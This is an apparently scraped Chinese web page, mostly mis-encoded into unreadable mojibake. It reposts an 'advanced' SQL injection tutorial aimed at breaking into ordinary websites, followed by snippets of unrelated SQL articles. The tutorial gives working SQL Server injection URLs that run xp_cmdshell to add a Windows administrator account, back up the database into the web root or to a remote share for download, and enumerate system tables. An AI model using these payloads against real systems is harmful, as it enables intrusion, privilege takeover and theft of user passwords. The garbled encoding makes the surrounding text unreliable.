Ò׽ؽØͼÈí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

SQL×¢È멶´½Ó´¥

 Òý×Ôhttp://www.05112.com/Article/200908/26674.html
ÍøÕ¾SQL×¢È멶´È«½Ó´¥£¨¸ß¼¶Æª£©
ÎÄÕÂÕûÀí·¢²¼£ººÚ¿Í·çÔÆ ÄÚÈݹØ×¢¶È£º
291 ¸üÐÂʱ¼ä£º2009-8-15 6:36:47
¿´ÍêÈëÃÅƪºÍ½ø½×ƪºó£¬ÉÔ¼ÓÁ·Ï°£¬ÆƽâÒ»°ãµÄÍøÕ¾ÊÇûÎÊÌâÁË¡£µ«Èç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËһЩÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿Çë´ó¼Ò½Ó×ÅÍùÏ¿´¸ß¼¶Æª¡£
µÚÒ»½Ú¡¢ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â
¡¡¡¡SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º
¡¡¡¡¢Ù http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
¡¡¡¡·ÖºÅ;ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬--±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃnetÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º
¡¡¡¡¢Ú http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾ­Äõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£
¡¡¡¡¢Û http://Site/url.asp?id=1 ;;and db_name()>0
¡¡¡¡Ç°ÃæÓиöÀàËƵÄÀý×Óand user>0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name()ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
¡¡¡¡¢Ü http://Site/url.asp?id=1;backup database Êý¾Ý¿âÃû to disk=’c:\inetpub\wwwroot\1.db’;--
¡¡¡¡ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃ棬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂ붼һÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç\\202.96.xx.xx\Share\1.db£©£¬µ«³É¹¦Âʲ»¸ß¡£
¡¡¡¡¢Ý http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects wh& #101;re xtype=’U’ and status>0)>0
¡¡¡¡Ç°Ãæ˵¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=’U’ and status>0£¬±íʾÓû


Ïà¹ØÎĵµ£º

SQLÖÐÂß¼­²éѯ´¦ÀíµÄ¸÷¸ö½×¶Î

 ÓйØSQLÖÐÂß¼­²éѯ´¦ÀíµÄ¸÷¸ö½×¶Î£¨×Ô¼º¸ãµÄÀý×Ó£¬²»¶ÔµÄ»¶Ó­Ö¸ÕýŶ£©
SQL²»Í¬ÓÚÆäËûµÄ±à³ÌÓïÑÔµÄ×î´ó×î´óÌØÕ÷ÓÐ3¸ö°É£¬
Ò»¸öÊÇËüÊÇÃæÏò¼¯ºÏµÄ±à³Ì˼Ï룬µÚ¶þ¸öÊÇÈýÖµÂß¼­£¨Õâ¸öºóÃæ»á˵µ½£©£¬»¹ÓÐÒ»¸ö¾ÍÊǽñÌìÖ÷ҪҪ˵µÄ²éѯԪËصÄÂß¼­´¦Àí´ÎÐò¡£
Çë¿´Ò»¸ö»ù±¾²éѯµÄÂß¼­¹ý³Ì£º
(8)  SELECT (9) DISTINCT ( ......

SQL ͨÓô洢¹ý³Ì


using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.Data.SqlClient;
/// <summary>
/ ......

SQL ¿ØÖÆÁ÷³Ì

Transact-SQL ÌṩÁË(BEGIN...END¡¢BREAK¡¢GOTO¡¢CONTINUE¡¢IF...ELSE¡¢WHILE¡¢RETURN¡¢WAITFOR)¿ØÖÆÁ÷¹Ø¼ü×Ö£¬ÓÃÓÚ¿ØÖÆ Transact-SQL Óï¾ä¡¢Óï¾ä¿é¡¢Óû§¶¨Ò庯ÊýÒÔ¼°´æ´¢¹ý³ÌµÄÖ´ÐÐÁ÷¡£ ²»Ê¹ÓÿØÖÆÁ÷ÓïÑÔ£¬Ôò¸÷ Transact-SQL Óï¾ä°´Æä³öÏÖµÄ˳Ðò·Ö±ðÖ´ÐС£¿ØÖÆÁ÷ÓïÑÔʹÓÃÓë³ÌÐòÉè¼ÆÏàËƵĹ¹ÔìʹÓï¾äµÃÒÔ»¥ÏàÁ¬½Ó¡¢¹ØÁªºÍ ......

Sql 2005 µÝ¹é²éѯ

 OracleÖеĵݹé²éѯ¿ÉÒÔÒÀ¿¿ÔöÇ¿µÄsqlÓï¾äSTART WITH ...CONNECT BY PRIORÀ´¸ã¶¨.sql 2005Öв»Ö§³Ö¸ÃÓï¾ä,ÒÔÏÂʾÀý¿ÉÒÔʵÏֵݹé²éѯ.
WITH TREE(xzdm,Prexzdm,lvl,topxzdm)
AS
(
    SELECT xzdm,prexzdm,1,prexzdm as topxzdm from xzdm WHERE Prexzdm = '000000000000'
 &nbs ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØͼ | ¸ÓICP±¸09004571ºÅ